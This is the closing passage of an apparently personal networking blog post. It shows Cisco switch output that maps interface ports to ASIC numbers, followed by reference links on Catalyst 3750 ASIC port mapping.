<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/40 40 40 40 1/17 1 40 40 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/41 41 41 41 1/20 1 41 41 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/42 42 42 42 1/19 1 42 42 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/43 43 43 43 1/22 1 43 43 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/44 44 44 44 1/21 1 44 44 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/45 45 45 45 1/24 1 45 45 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/46 46 46 46 1/23 1 46 46 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/47 47 47 47 1/26 1 47 47 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/48 48 48 48 1/25 1 48 48 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/49 49 49 49 0/13 1 49 49 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/50 50 50 50 1/13 1 50 50 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Te1/0/1 51 51 51 0/0 1 1 51 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Te1/0/2 52 52 52 1/0 1 2 52 local Yes Yes</span><br />
<div>
<br /></div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<h3>
<span style="font-family: "courier new" , "courier" , monospace;">References</span></h3>
<span style="font-family: "courier new" , "courier" , monospace;"><a href="https://ciscointerworking.wordpress.com/2015/06/14/asic-redundancy/" target="_blank">Cisco ASIC-Redundancy</a></span><br />
<a href="https://supportforums.cisco.com/t5/lan-switching-and-routing/question-on-3750-asics/td-p/2063514" target="_blank">Question On 3750 Asics</a><br />
<a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750/software/release/12-2_55_se/commmand/reference/3750cr/showplat.html" target="_blank">Catalyst 3750 Switch Show Platform Commands</a><br />
<a href="https://ccna2ccnp.blogspot.com/2012/05/viewing-asic-mappings-6509e-3750e.html" target="_blank">Viewing ASIC Mappings - 6509E & 3750E</a><br />
<a href="https://www.m00nie.com/2011/02/asic-to-port-mapping/" target="_blank">ASIC to port mapping</a>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0